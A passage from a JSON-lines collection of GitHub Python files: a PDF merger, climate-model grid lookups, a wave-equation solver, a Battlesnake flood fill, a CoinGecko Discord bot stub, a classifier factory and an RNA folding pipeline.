open(f'Merged PDF Generated {time.strftime(\"%Y-%m-%d-%H%M%S\")}.pdf', \"wb\") as file:\n        merged.write(file)\n\n\nif __name__ == \"__main__\":\n\n    import argparse\n    parser = argparse.ArgumentParser()\n    parser.add_argument('fp1', type=str, help='Original filepath')\n    parser.add_argument('fp2', type=str, help='New filepath')\n    parser.add_argument('--wm', \"--w\", help=\"Filepath of PDF watermark to apply to both pages\")\n    parser.add_argument('--m1', \"--wm1\", \"--mark1\", help=\"Filepath of PDF watermark to apply to the original PDF\")\n    parser.add_argument('--m2', \"--wm2\", \"--mark2\", help=\"Filepath of PDF watermark to apply to the new PDF\")\n    args = parser.parse_args()\n    pdf_merger(args.fp1, args.fp2, args.wm, args.m1, args.m2)\n","repo_name":"jeffkess/PDF_Interweaver","sub_path":"pdf_interweaver.py","file_name":"pdf_interweaver.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"21368359918","text":"# -*- coding: utf-8 -*-\n__author__ = 'lnx'\nimport netCDF4\nimport numpy as np\n\ndef geo_idx(dd, dd_array):\n    \"\"\"\n    Search for the nearest decimal degree in an array of decimal degrees and return the index.\n    np.argmin returns the indices of the minimum value along an axis,\n    so subtract dd from all values in dd_array, take the absolute value and find the index of the minimum.\n    \"\"\"\n    geo_idx = (np.abs(dd_array - dd)).argmin()\n    return geo_idx\n\ndef find_nearest(array, value):\n    array = np.asarray(array)\n    idx = (np.abs(array - value)).argmin()\n    return array[idx], idx\n\ndef find_nearest_xy(array1, value1, array2, value2):\n    array1 = np.asarray(array1)\n    array2 = np.asarray(array2)\n    idx = (np.abs(array1 - value1)+np.abs(array2 - value2)).argmin()\n    return array1[idx], array2[idx], idx\n\n\n#Christians data 9km VIE center (exact: 48.196613 16.382294)\ninfile = '/windata/DATA/models/boku/wrf/120521/9km_3km_2domain/wrfout_d01_2019-07-01_00:00:00'\nwest_east = 198\nsouth_north = 135\nnci = netCDF4.Dataset(infile)\nprint(nci.variables['XLAT'][1,69,99]) #48.200005\nprint(nci.variables['XLONG'][1,69,99]) #16.400024\n#Christians data 9km Rutzendorf (exact: 48.206673 16.623864)\nprint(nci.variables['XLAT'][1,69,101]) #48.199753\nprint(nci.variables['XLONG'][1,69,101]) #16.642914\n\nexit()\n\n#TROPOMI SIF 1D\ninfile1 = netCDF4.Dataset('/windata/DATA/remote/satellite/TROPOMI/2020/06/TROPOSIF_L2B_2020-06-01.nc')\ninfile2 = netCDF4.Dataset('/windata/DATA/remote/satellite/TROPOMI/2020/06/TROPOSIF_L2B_2020-06-02.nc')\ninfile1_data = infile1['/PRODUCT']\ninfile2_data = infile2['/PRODUCT']\nn_elem = 2421884\n#print(infile1_data.variables['longitude'][1021884]) #48.192142\n#print(infile2_data.variables['longitude'][1021884]) 
#48.192142\n\n#print(find_nearest(infile1_data.variables['longitude'], 16)\n#print(find_nearest(infile1_data.variables['latitude'], 48))\nprint(\"CE\", find_nearest_xy(infile1_data.variables['latitude'], 48.196613, infile1_data.variables['longitude'], 16.382294))\nprint(\"CE\", find_nearest_xy(infile2_data.variables['latitude'], 48.196613, infile2_data.variables['longitude'], 16.382294))\n\nprint(\"RU\", find_nearest_xy(infile1_data.variables['latitude'], 48.192142, infile1_data.variables['longitude'], 16.624939))\nprint(\"RU\", find_nearest_xy(infile2_data.variables['latitude'], 48.192142, infile2_data.variables['longitude'], 16.624939))\n\nexit()\n\n#Jans data 3km VIE center\ninfile = '/media/heidit/Norskehavet/EMEPData/OUTPUT/wrfout_d02_2020-01-01_00:00:00'\nnci = netCDF4.Dataset(infile)\n#print(nci.variables['XLAT'][1,76,181]) #48.19662\n#print(nci.variables['XLONG'][1,76,181]) #16.382263\n\n#Jans data 9km VIE center\ninfile = '/media/heidit/Norskehavet/EMEPData/OUTPUT/2020_4/wrfout_d01_2020-03-31_01:00:00'\nwest_east = 189\nsouth_north = 165\nnci = netCDF4.Dataset(infile)\nprint(nci.variables['XLAT'][1,59,110]) #48.196613\nprint(nci.variables['XLONG'][1,59,110]) #16.382294\n#Jans data 9km Rutzendorf\nprint(nci.variables['XLAT'][1,59,112]) #48.192142\nprint(nci.variables['XLONG'][1,59,112]) #16.624939\n\n#find Bosco Fontana, IT\nin_lat = 45.199292\nin_lon = 10.7399\nprint(nci.variables['XLAT'][1,23,62])\nprint(nci.variables['XLONG'][1,23,62])\n\n#find O3HP, FR (Saint-Michel-l'Observatoire, 04870 France)\nin_lat = 43.9311448\nin_lon = 5.713935\nprint(nci.variables['XLAT'][1,11,16])\nprint(nci.variables['XLONG'][1,11,16])\n\nexit()\n#find Vielsalm, BE\nin_lat = 50.30\nin_lon = 5.99\nprint(nci.variables['XLAT'][1,89,27]) #\nprint(nci.variables['XLONG'][1,89,27])\n\nlats = nci.variables['XLAT'][1,89,:]\nlons = nci.variables['XLONG'][1,:,27]\nlat_idx = geo_idx(in_lat, lats)\nlon_idx = geo_idx(in_lon, lons)\nprint(lat_idx,lon_idx)\n#iy = lat_idx%south_north\n#ix = lon_idx%west_east\n#50.332256\n#5.9249268\n\n\n","repo_name":"ln-x/met","sub_path":"5_UOZONE/notused/1a_extractFluxOBS_indices.py","file_name":"1a_extractFluxOBS_indices.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"73051714010","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom functions import *\r\n\r\n#Funktion (exp used in paper)\r\ndef f(x, t):\r\n w = 2*np.pi\r\n k = 2*np.pi\r\n # np.exp(-k*x**2)\r\n return np.exp(-k*x**2)\r\n\r\n\r\n\r\ndef waveequation(x, t, h_x, h_t, bc):\r\n\r\n if bc == \"periodic\":\r\n phi_0 = np.zeros(len(x) + 2) # Phi(x, t = 0)\r\n phi_0[1:-1] = f(x, 0)\r\n phi_0[0] = phi_0[-3] # add Ghostpoints\r\n phi_0[-1] = phi_0[2]\r\n\r\n pi_0 = np.zeros(len(x)) \t # Pi(x, t = 0)\r\n pi_0 = -1*first_derivative(phi_0, h_x) # -1 für richtung der welle\r\n\r\n\r\n elif bc == \"open_i\":\r\n phi_0 = np.zeros(len(x) + 2) # Phi(x, t = 0)\r\n phi_0[1:-1] = f(x, 0)\r\n phi_0[0] = phi_0[1] - (phi_0[2] - phi_0[1])\r\n phi_0[-1] = phi_0[-2] + (phi_0[-2] - phi_0[-3])\r\n\r\n pi_0 = np.zeros(len(x)) \t # Pi(x, t = 0)\r\n pi_0 = -1*first_derivative(phi_0, h_x) # -1 für richtung der welle\r\n\r\n elif bc == \"open_ii\":\r\n phi_0 = np.zeros(len(x) + 2) # Phi(x, t = 0)\r\n phi_0[1:-1] = f(x, 0)\r\n phi_0[0] = phi_0[1] - phi_0[2] # add Ghostpoints\r\n phi_0[-1] = phi_0[-2] - phi_0[-3]\r\n\r\n pi_0 = np.zeros(len(x)) \t # Pi(x, t = 0)\r\n pi_0 = -1*first_derivative(phi_0, h_x) # -1 für richtung der 
welle\r\n\r\n #--------------------------------------------------------------------\r\n solution = [phi_0[1:-1], pi_0]\r\n\r\n def dgl(t, solution): # PDE of waveequation + boundary conditions\r\n if bc == \"periodic\":\r\n phi = np.zeros(len(solution[0]) + 2)\r\n phi[1:-1] = solution[0]\r\n phi[0] = solution[0][-3]\r\n phi[-1] = solution[0][2]\r\n\r\n if bc == \"open_i\":\r\n phi = np.zeros(len(solution[0]) + 2)\r\n phi[1:-1] = solution[0]\r\n phi[0] = phi[1] - (phi[2] - phi[1])\r\n phi[-1] =phi[-2] + (phi[-2] - phi[-3])\r\n\r\n if bc == \"open_ii\":\r\n phi = np.zeros(len(solution[0]) + 2)\r\n phi[1:-1] = solution[0]\r\n pi = solution[1]\r\n\r\n phi[0] = phi[2] - 2*h_x*pi[0]\r\n phi[-1] = phi[-3] - 2*h_x*pi[-1]\r\n\r\n\r\n\r\n dphidt = solution[1]\r\n dpidt = second_derivative(phi, h_x)\r\n u_punkt = np.array([dphidt, dpidt])\r\n return u_punkt\r\n\r\n yout, t = rungekutta(solution, t, dgl)\r\n\r\n return yout, t\r\n\r\n\r\n#------------------------------------------------------------------------------\r\n#convergence\r\n#calculate the convergence with max norm and euklidian norm\r\ndef wave_convergence(h_x, h_t, x_start, x_end, t_start, t_end, bc):\r\n h_xc = [h_x, h_x/2, h_x/4]\r\n h_tc = [h_t, h_t/2, h_t/4]\r\n\r\n N_xc = [int((x_end - x_start)/h_xc[0] + 1),int((x_end - x_start)/h_xc[1] + 1),int((x_end - x_start)/h_xc[2] + 1)]\r\n N_tc = [int((t_end - t_start)/h_tc[0] + 1),int((t_end - t_start)/h_tc[0] + 1),int((t_end - t_start)/h_tc[0] + 1)]\r\n\r\n xc = [np.linspace(x_start, x_end, N_xc[0]),np.linspace(x_start, x_end, N_xc[1]),np.linspace(x_start, x_end, N_xc[2])]\r\n tc = [np.linspace(t_start, t_end, N_tc[0]),np.linspace(t_start, t_end, N_tc[1]),np.linspace(t_start, t_end, N_tc[2])]\r\n\r\n yout1, t1 = waveequation(xc[0], tc[0], h_xc[0], h_tc[0], bc)\r\n yout2, t2 = waveequation(xc[1], tc[1], h_xc[1], h_tc[1], bc)\r\n yout4, t4 = waveequation(xc[2], tc[2], h_xc[2], h_tc[2], bc)\r\n\r\n\r\n\r\n #Euklidische Norm\r\n selvcon = np.zeros(len(tc[0]))\r\n\r\n #maximumsnorm\r\n max = np.zeros(len(tc[0]))\r\n\r\n for i in range(len(tc[0])):\r\n selvcon[i] = selfconvergence(yout1[i,0,:], yout2[i,0,::2], yout4[i,0,::4]) #euklidisch\r\n max[i] = maxnorm(yout1[i,0,:], yout2[i,0,::2], yout4[i,0,::4]) #maxnorm\r\n\r\n return selvcon, max, tc\r\n#-----------------------------------------------------------------------------\r\n#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n#Globale parameter\r\n#start and end point of x\r\nx_start = -1\r\nx_end = 1\r\n\r\n#start and end of t\r\nt_start = 0\r\nt_end = 2\r\n\r\n#step scize Delta x and Delta t\r\nh_x = 0.1\r\nh_t = 0.01\r\n\r\n#velocity\r\nc = 1\r\n\r\nalpha = c*h_t/h_x\r\nprint(\"alpha = \", alpha)\r\n\r\n#define spacial grdid and time grid\r\nN_x = int((x_end - x_start)/h_x + 1)\r\nN_t = int((t_end - t_start)/h_t + 1)\r\n\r\nx = np.linspace(x_start, x_end, N_x)\r\nt = np.linspace(t_start, t_end, N_t)\r\n\r\n#---------------------------------------------------------------------\r\n\r\n\r\n#print the wave: choose the boundary conditions between 'periodic', 'open_i' and 'open_ii'\r\nyout, t = waveequation(x, t, h_x, h_t, 'periodic') # yout = [Phi, Pi]\r\n\r\n\r\n#hcalculate selfconvergence: choose the boundary conditions between 'periodic', 'open_i' and 'open_ii'\r\nselvcon2, max, tc2 = wave_convergence(h_x, h_t, x_start, x_end, t_start, t_end, 'periodic') #selvcon2 = euklidische norm\r\n # max = maximum norm\r\n # tc2 = 
time\r\n#plots\r\nplt.figure()\r\nplt.plot(tc2[0], max, label = 'open bc')\r\nplt.xlabel('t')\r\nplt.ylabel('Q')\r\nplt.ylim(0, 4)\r\nplt.grid()\r\n#plt.title('Q(t) selfconvergence $\\\\alpha$ = %1.3f' %alpha)\r\nplt.legend(loc='upper right')\r\n\r\n\r\n\r\nplt.figure()\r\nplt.pcolor(x, t, yout[:,0], label = '$\\\\alpha$ = %1.3f' %alpha)\r\nplt.ylabel('t')\r\nplt.xlabel('x')\r\nplt.colorbar()\r\nplt.title('$\\\\phi(x, t)$')\r\nplt.legend()\r\nplt.show()\r\n","repo_name":"Aemmel/Wave-Equation-Research-Lab-Project","sub_path":"main-task/wave_equation.py","file_name":"wave_equation.py","file_ext":"py","file_size_in_byte":5541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25203016885","text":"import numpy as np\nimport numpy.linalg as la\n\nimport matplotlib.pyplot as plt\n\nclass System:\n def __init__(self, A, x):\n self.A = A\n self.x = x\n\n def update(self, dt):\n dx_dt = self.A @ self.x\n self.x = self.x + ((dx_dt) * dt)\n\n return self.x, dx_dt\n\ndef plot_system(system, iters, dt): # integrates really poorly\n time = 0\n\n X = []\n Y = []\n U = []\n V = []\n\n for _ in range(iters):\n # print(f'({spring.x[0]}, {spring.x[1]}), ({time}, {spring.x[0]}), ({time}, {spring.x[1]}), ', end='')\n x, dx_dt = system.update(dt)\n\n X.append(x[0])\n Y.append(x[1])\n U.append(dx_dt[0])\n V.append(dx_dt[1])\n\n\n time += dt\n\n plt.quiver(X, Y, U, V)\n plt.show()\n\ndef plot_system_2(system, iterations, dt):\n eigvals, eigvecs = la.eig(system.A)\n def x(t):\n return sum(np.exp(value * t) * vector for value, vector in zip(eigvals, eigvecs))\n \n time = 0\n X = []\n Y = []\n\n for i in range(iterations):\n state = np.real(x(time))\n\n X.append(state[0])\n Y.append(state[1])\n\n time += dt\n\n plt.plot(X, Y)\n plt.show()\n\n\ndef plot_system_3(system, total_time, dt):\n eigvals, eigvecs = la.eig(system.A)\n def x(t):\n return sum(np.exp(value * t) * vector for value, vector in zip(eigvals, eigvecs))\n \n T=[]\n X=[]\n\n time = 0\n while time <= total_time:\n state = np.real(x(time))[0]\n T.append(time)\n X.append(state)\n time += dt\n\n return T, X\n\nk = 1.2\nb = 0.0\nm = 1.0\n\nA = np.array([[ 0, 1 ],\n [-k/m, -b/m]])\n\nx = np.array([ 1, 0 ])\n\n\nspring = System(A, x)\n\ndt = 0.1\ntime = 0\n\nfig, ax = plt.subplots()\n\nT, X = plot_system_3(spring, 10, dt)\ntext = f'k={k:.3}N/m, m={m:.3}kg, b={b:0.3}Ns/m'\nax.plot(T, X)\nax.set_title('Spring position vs time (' + (r'$' + text +'$)'))\nax.set_xlabel('Time (s)')\nax.set_ylabel('Position (m)')\nplt.show()\n\n# import time\n# fig.savefig(f'./output-{int(time.time() * 10**4)}.png', dpi=75, bbox_inches='tight', pad_inches=0.1)\n","repo_name":"selym3/control-theory-presentation","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25650533436","text":"import Queue\n\nfrom coord import Coord, UP, DOWN, LEFT, RIGHT\n\n\ndef flatten(l):\n \"\"\"Flatten list of lists to list of items.\"\"\"\n return [item for sublist in l for item in sublist]\n\n\ndef map_to_one(v, l, h):\n \"\"\"Map a value v in range (l, h) to (0, 1).\"\"\"\n return ((v - l) / (h - l)) * (1 - 0) + 0\n\n\ndef clamp(point, min, max):\n return min if point < min else max if point > max else point\n\n\ndef intersect(a, b):\n \"\"\"Return the intersection of two lists.\"\"\"\n return list(set(a) & set(b))\n\n\ndef average_length(snakes):\n \"\"\"Get average length for a list of 
snakes\"\"\"\n return sum([snake.length() for snake in snakes]) / len(snakes)\n\n\ndef flood_fill(game, coord):\n '''\n Flood fill an area, giving opponent snakes a chance to expand before checking if it's large enough to enter\n :param game: A game object\n :param coord: A coordinate to try\n :return: Number of empty cells immediately reachable if this move is chosen\n '''\n\n class Cell(Coord):\n def __init__(self, c, type):\n Coord.__init__(self, c)\n self.cell_type = 'wall' if type == 1 else 'body' if type == 2 else 'head' if type == 3 else 'open'\n self.visited = False\n\n def __str__(self):\n return \"{}\".format(\"+\" if self.cell_type == 'wall' and self.visited\n else \"X\" if self.cell_type == 'wall'\n else \"*\" if self.cell_type == 'body'\n else \"@\" if self.cell_type == 'head'\n else \".\" if self.visited\n else \" \"\n )\n\n def __repr__(self):\n return self.__str__()\n\n def markup(board):\n return [[Cell([x, y], cell) for x, cell in enumerate(row)]\n for y, row in enumerate(board)]\n\n board = markup(game.board)\n\n # Before the fill, move the opponent snake heads out one in each way\n for snake in game.other_snakes:\n \n if board[snake.head().up().y + 1][snake.head().x + 1].cell_type == 'open':\n board[snake.head().up().y + 1][snake.head().x + 1].cell_type = 'wall'\n\n if board[snake.head().down().y + 1][snake.head().x + 1].cell_type == 'open':\n board[snake.head().down().y + 1][snake.head().x + 1].cell_type = 'wall'\n\n if board[snake.head().y + 1][snake.head().left().x + 1].cell_type == 'open':\n board[snake.head().y + 1][snake.head().left().x + 1].cell_type = 'wall'\n\n if board[snake.head().y + 1][snake.head().right().x + 1].cell_type == 'open':\n board[snake.head().y + 1][snake.head().right().x + 1].cell_type = 'wall'\n\n # 3. Set Q to the empty queue.\n Q = Queue.Queue()\n\n # 4. Add node to Q.\n start = board[coord.y + 1][coord.x + 1]\n start.visited = True\n start.type = 3 # Our head goes there\n Q.put(start)\n\n # 5. For each element N of Q:\n space = 0\n while not Q.empty():\n\n # 6. Set west and east equal to the current spot.\n spot = Q.get()\n west = spot\n east = spot\n\n next_west = board[west.y][west.left().x]\n next_east = board[east.y][east.right().x]\n\n # 7. Move west to the left until\n # - the cell to the left of west no longer open.\n while next_west.cell_type == 'open' and next_west.visited == False:\n west = next_west\n next_west = board[next_west.y][next_west.x - 1]\n\n # 8. Move east to the right until\n # - the cell to the right of east no longer open.\n while next_east.cell_type == 'open' and next_east.visited == False:\n east = next_east\n next_east = board[next_east.y][next_east.x + 1]\n\n # 9. For each cell between west and east:\n for x in range(west.x, east.x + 1):\n\n # 10. Set the this cell visited\n point = board[spot.y][x]\n point.visited = True\n\n # Keep track of total found space\n space += 1\n\n # There's enough space to move there\n if space > 2 * game.me.length():\n return space\n\n # 11. If the cell to the north of this is unvisited, add that cell to Q.\n y = clamp(point.up().y, 0, game.height)\n if not board[y][x].visited and board[y][x].cell_type == 'open':\n Q.put(board[y][x])\n\n # 12. If the cell to the south of this is unvisited, add that cell to Q.\n y = clamp(point.down().y, 0, game.height)\n if not board[y][x].visited and board[y][x].cell_type == 'open':\n Q.put(board[y][x])\n\n # 13. 
Continue looping until Q is exhausted or there's enough space\n\n    return space\n\n\ndef dir_str_to_direction(d_str, game):\n    head = game.me.head()\n\n    if d_str == UP:\n        return head.up()\n    if d_str == DOWN:\n        return head.down()\n    if d_str == LEFT:\n        return head.left()\n    if d_str == RIGHT:\n        return head.right()\n","repo_name":"coffee-cup/battlesnake-2017","sub_path":"app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"17334694161","text":"from pycoingecko import CoinGeckoAPI\r\nimport requests  # required by the REST calls below; this import was missing\r\nimport discord\r\nfrom discord.ext import commands\r\n\r\nbot = commands.Bot(command_prefix='?',description='Bot')\r\n\r\ntoken = 'Bot Token'\r\n\r\nurl = 'https://api.coingecko.com/api/v3/'\r\n\r\nclass CoinGecko():\r\n    def price(self, ids, vs_currencies, include_market_cap):\r\n        query = {\r\n            'ids': ids,\r\n            'vs_currencies': vs_currencies,\r\n            'include_market_cap': include_market_cap\r\n        }\r\n\r\n        response = requests.get(url + 'simple/price', params=query).json()\r\n\r\n        return response\r\n\r\n    def supported_currencies(self):\r\n        response = requests.get(url + 'simple/supported_vs_currencies').json() \r\n\r\n        return response\r\n\r\n    def search(self, keyword=''):\r\n        query = {'query': keyword}\r\n\r\n        response = requests.get(url + 'search', params=query).json()['coins'][0]['name']\r\n\r\n        return response\r\n\r\ncg = CoinGecko()\r\n\r\n#price = cg.price(ids='ethereum', vs_currencies='sats', include_market_cap='false')\r\n#supported_c = cg.supported_currencies()\r\nsearch = cg.search('')\r\n\r\n#print(price)\r\n#print(list)\r\nprint(search)\r\n","repo_name":"salmen1234/CoinGecko-Discord-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"1835896186","text":"from typing import Optional\nimport json\nfrom datetime import datetime, date, time, timedelta\nfrom mako.template import Template\nimport mako.exceptions\nimport sysinvest.common.plugin.constants as const\nimport logging\n\n\nclass PluginResultEncoder( json.JSONEncoder ):\n    def default( self, obj ):\n        if isinstance( obj, Exception ):\n            return str( obj )\n\n        return obj\n\n\nclass HasAttribute( object ):\n    def __init__( self, attrs ):\n        self.__attrs = attrs\n        return\n\n    def __call__(self, *args, **kwargs):\n        result = True\n        for arg in args:\n            if arg not in self.__attrs:\n                result = False\n                break\n\n        return result\n\n\nclass PluginResult( object ):\n    EXC_TEMPLATE = \"${name} => ${result} ${message}\"\n    TEMPLATE = \"${name} => ${result}\"\n\n    def __init__( self, plugin: 'Plugin' ):\n        self.log = logging.getLogger( 'result' )\n        self.__result = False\n        self.__message = 'Collecting data'\n        self.__state = 1\n        self.__data = {}\n        self.__plugin = plugin\n        for k, v in self.__plugin.Parent.info().items():\n            self.__data[ k ] = v\n\n        return\n\n    def update( self, result: bool, message: str, data: dict = None, **kwargs ):\n        self.__state = 2\n        self.__result = result\n        self.__message = message\n        self.__data.update( data if isinstance( data, dict ) else {} )\n        for k, v in kwargs.items():\n            self.__data[ k ] = v\n\n        for k, v in self.Plugin.Parent.info().items():\n            self.__data[ k ] = v\n\n        self.log.info( f\"PluginResult.update( {result}, '{message}', {data}, **{kwargs} )\" )\n        return\n\n    @property\n    def Name( self ) -> str:\n        return self.__plugin.Name\n\n    @property\n    def Result( self ) -> bool:\n        return 
self.__result\n\n @Result.setter\n def Result( self, value: bool ):\n self.__result = value\n return\n\n @property\n def Message( self ) -> str:\n return self.__message\n\n @Message.setter\n def Message( self, value: str ):\n self.__message = value\n return\n\n @property\n def Details( self ) -> dict:\n return self.__data\n\n @property\n def Plugin( self ) -> 'Plugin':\n return self.__plugin\n\n def buildMessage( self, translate: Optional[list] = None ) -> str:\n result = ''\n kwargs = {\n 'result': self.__result,\n 'name': self.Name,\n 'message': self.__message,\n }\n kwargs.update( self.__data )\n kwargs[ 'hasAttribute' ] = HasAttribute( kwargs )\n kwargs[ 'datetime' ] = datetime\n kwargs[ 'date' ] = date\n kwargs[ 'time' ] = time\n kwargs[ 'timedelta' ] = timedelta\n try:\n if const.C_EXCEPTION in self.__data:\n return Template( self.EXC_TEMPLATE ).render( **kwargs )\n\n template = self.Plugin.Template if self.Plugin.Template is not None else self.TEMPLATE\n result = Template( template ).render( **kwargs ).strip( ' \\r\\n' )\n if isinstance( translate, list ):\n try:\n for ch, tr in translate:\n result = result.replace( ch, tr )\n\n except Exception:\n self.log.exception( f\"During translate \" )\n\n\n except NameError:\n self.log.error( f\"{mako.exceptions.text_error_template().render()}\\n{kwargs}\" )\n\n return result\n\n def __repr__(self):\n return f\"\"\n\n def dump( self ):\n print( f\"PluginResult {self.Name}: {self.__result} :: {self.__message}\" )\n if self.__data:\n print( self.__data )\n\n def toJson( self ):\n return {\n \"name\": self.Name,\n \"result\": self.Result,\n \"message\": self.buildMessage()\n }","repo_name":"pe2mbs/sysinvest","sub_path":"sysinvest/common/plugin/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23058505744","text":"import copy\n\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom Classification_Project.IllegalArgumentException import IllegalArgumentException\n\n\nclass ClassifierFactory:\n def __init__(self):\n self.classifier_prototypes = []\n\n self.classifier_prototypes.append(DecisionTreeClassifier())\n self.classifier_prototypes.append(RandomForestClassifier())\n self.classifier_prototypes.append(ExtraTreesClassifier())\n self.classifier_prototypes.append(LogisticRegression())\n self.classifier_prototypes.append(MLPClassifier())\n self.classifier_prototypes.append(LinearSVC())\n self.classifier_prototypes.append(SVC())\n\n def get_classifier(self, classifier_class_name, params_dictionary):\n classifier = copy.deepcopy(self.__find_prototype(classifier_class_name))\n\n self.__fill_classifier_params(classifier, params_dictionary)\n\n return classifier\n\n def __fill_classifier_params(self, classifier, params_dictionary):\n for param in params_dictionary:\n if not hasattr(classifier, param):\n raise IllegalArgumentException('%s doesn\\'t contain %s parameter.' 
% (type(classifier).__name__, param))\n\n            setattr(classifier, param, params_dictionary[param])\n\n    def __find_prototype(self, classifier_class_name):\n        for proto in self.classifier_prototypes:\n            if type(proto).__name__.lower() == classifier_class_name.lower():\n                return proto\n\n        raise IllegalArgumentException('Given classifier name is incorrect. There is no classifier with name %s.' %\n                                       classifier_class_name)\n\n","repo_name":"DmytroSavchuk/PythonClassificationBack","sub_path":"Classification_Project/ClassifierFactory.py","file_name":"ClassifierFactory.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"21545246249","text":"# Import systems\nimport re, os, sys, csv, scipy, shutil, subprocess\nimport numpy as np\nimport pandas as pd\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\nfrom scipy import stats\nfrom Bio.Alphabet import IUPAC\nfrom subprocess import PIPE, run\nfrom transcripts_info import dict_transcripts\n\ndef out(command):\n    result = run(command, stdout = PIPE, stderr = PIPE, \\\n        universal_newlines = True, shell = True)\n    return result.stdout\n\n# DCX is a reverse transcribed gene, therefore the start location\n# is actually the 'end' location\ndef getStartLocation(input_file):\n    records = SeqIO.parse(open(input_file), 'fasta')\n    record = next(records)\n    parts = record.description.split(':')\n    location = parts[-2]\n    if location.isdigit():\n        start_location = int(location)\n    else:\n        start_location = int(len(record.seq))\n    return start_location\n\n# Not needed in this case\ndef getEndLocation(input_file):\n    records = SeqIO.parse(open(input_file), 'fasta')\n    record = next(records)\n    parts = record.description.split(':')\n    end_location = parts[-3]\n    return end_location\n\ndef doTranscribeRNA(input_file):\n    for record in SeqIO.parse(open(input_file), 'fasta'):\n        sequence = record.seq\n    return sequence\n\ndef doFragmentTranscript(gene_sequence, gene_start_location, \\\n    fragment_step, fragment_length):\n    d = {}\n    count = 0\n    start = gene_start_location\n    for i in range(0, len(str(gene_sequence)), fragment_step):\n        v = str(gene_sequence)[(count):(count+fragment_length)]\n        if len(v) == fragment_length:\n            k = str(start) + '_' + str(start-len(v)+1)\n            d[k] = v\n            count += fragment_step\n            start -= fragment_step\n        elif len(v) == len(v)%fragment_length:\n            break\n    return d\n\ndef runShuffleAndFold(input_file, dictionary, temp_file,\\\n    temp_copy_file, cmd_shuffle, cmd_fold):\n    f = input_file.split('.')\n    file_name = f[0] + '_output.' + f[1]\n    ofile = open(file_name, 'w')\n    for key, value in dictionary.items():\n        ofile.write('>' + key + '\\n' + \\\n            value + '\\n')\n        tempofile = open(temp_file, 'w')\n        tempofile.write('>' + key + '\\n' + \\\n            value + '\\n')\n        tempofile.close()\n        shuffled = out(cmd_shuffle)\n        ofile.write(shuffled)\n    ofile.close()\n    # run RNAfold\n    shutil.copyfile(file_name, temp_copy_file)\n    in_RNAfold = open(temp_copy_file, 'r')\n    out(cmd_fold)\n    # remove/move files\n    cmd = ('find . 
-name \"*.ps\" -delete')\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell = True)\n os.remove(temp_file)\n os.remove(temp_copy_file)\n return\n\ndef doCsvFile(fasta_file, n_random):\n with open (fasta_file, 'r') as f:\n lines = f.read().splitlines()\n # list of IDs\n id_line = lines[0::3]\n secondary_IDs = [] # list of secondary IDs\n for x in id_line:\n x = x.replace('>', '')\n secondary_IDs.append(x)\n item_IDs = secondary_IDs[::int(n_random+1)]\n primary_IDs = [] # list of primary IDs\n for x in item_IDs:\n x = x.replace('>', '')\n count = 0\n while count < (n_random+1):\n primary_IDs.append(x)\n count += 1\n # list of sequences\n sequences = list(lines[1::3])\n # list of fold\n third_line = list(lines[2::3])\n fold = []\n p_1 = re.compile(r'^([\\S]+)') # regex for fold\n for i in third_line:\n fold += p_1.findall(i)\n # list of energy\n energy = []\n p_2 = re.compile(r'\\s\\((.*?)\\)') # regex for energy\n for i in third_line:\n energy += p_2.findall(i)\n # make csv from dictionary\n d = {'Primary ID':primary_IDs, 'Secondary ID':secondary_IDs, \\\n 'Sequence':sequences, 'Fold':fold, 'MFE':energy}\n df = pd.DataFrame(d)\n file_name = (fasta_file.split('.'))[0] + '.csv'\n with open (file_name, 'w') as f:\n df.to_csv(f, sep = '\\t', index=False)\n f.close()\n return\n\ndef doZscore(csv_file, n_random):\n df = pd.read_csv(csv_file, sep = '\\t')\n row_start = 0\n row_end = n_random + 1\n step = n_random + 1\n zscore = []\n while row_end <= len(df):\n selected_rows = df['MFE'].iloc[row_start:row_end]\n arr = []\n for x in selected_rows:\n arr.append(round(float(x)))\n if arr.count(0) == len(arr):\n scores = arr\n else:\n scores = stats.zscore(arr)\n for i in scores:\n zscore.append(round(i, 3))\n arr.clear()\n row_start += step\n row_end += step\n df['Zscore'] = zscore\n with open(csv_file, 'w') as f:\n df.to_csv(f, index=False)\n f.close()\n return\n\n\ndef doPvalue(csv_file):\n df = pd.read_csv(csv_file)\n pvalue = []\n selected_rows = df['Zscore']\n for x in selected_rows:\n pvalue.append(float((round(scipy.stats.norm.sf((abs(x))*2), 3))))\n df['Pvalue'] = pvalue\n with open(csv_file, 'w') as f:\n df.to_csv(f, index=False)\n f.close()\n return\n\ndef doClusters(csv_file, pvalue, energy, fragment_length, \\\n gene_sequence, gene_start_location, \\\n 